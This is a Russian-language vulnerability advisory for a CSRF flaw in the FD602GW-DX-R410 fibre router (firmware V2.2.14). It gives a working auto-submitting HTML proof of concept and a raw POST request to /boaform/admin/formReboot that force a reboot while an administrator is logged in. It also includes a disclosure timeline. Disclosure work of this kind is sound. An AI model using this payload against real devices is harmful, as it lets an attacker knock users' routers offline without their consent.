
Уязвимость CSRF в маршрутизаторе FD602GW-DX-R410 позволяет удалённым злоумышленникам перезагрузить устройство с помощью специально сформированного POST-запроса к /boaform/admin/formReboot, когда администратор аутентифицирован.
Доказательство концепции и бюллетень безопасности для уязвимости межсайтовой подделки запроса (CSRF) в административном интерфейсе оптоволоконного маршрутизатора FD602GW-DX-R410 (прошивка V2.2.14). В бюллетене описываются влияние, вектор атаки и рекомендации по устранению.
CSRF-уязвимость в маршрутизаторе FD602GW-DX-R410 позволяет удалённым злоумышленникам перезагружать устройство с помощью специально сформированного POST-запроса к /boaform/admin/formReboot, когда администратор аутентифицирован.
В веб-консоли администратора оптоволоконного маршрутизатора FD602GW-DX-R410 (прошивка V2.2.14) обнаружена уязвимость межсайтовой подделки запроса (CSRF). Конечная точка /boaform/admin/formReboot принимает POST-запросы, вызывающие полную перезагрузку устройства, без CSRF-токенов и проверки источника запроса. Если аутентифицированный администратор посещает вредоносную страницу, маршрутизатор может быть перезагружен удалённо без согласия.
/boaform/admin/formReboot<html>
<!-- CSRF PoC - generated by Burp Suite Pro -->
<body>
<form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
<input type="hidden" name="postSecurityFlag" value="+65535" />
<input type="submit" value="Submit" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
POST /boaform/admin/formReboot HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
postSecurityFlag=+65535
HTTP 200 OK; маршрутизатор перезагружается немедленно.
| Дата | Действие |
|---|---|
| июнь 2025 | Уязвимость обнаружена |
| июнь 2025 | Попытка ответственного раскрытия (ответа не получено) |
| июль 2025 | Запрошен идентификатор CVE у MITRE |
| июль 2025 | Бюллетень подготовлен, публикация ожидается |
| сентябрь 2025 | CVE присвоен, бюллетень опубликован |
Данный бюллетень предоставлен в образовательных целях и для повышения осведомлённости в области безопасности. Автор не несёт ответственности за неправомерное использование. Все тесты проводились в контролируемой среде.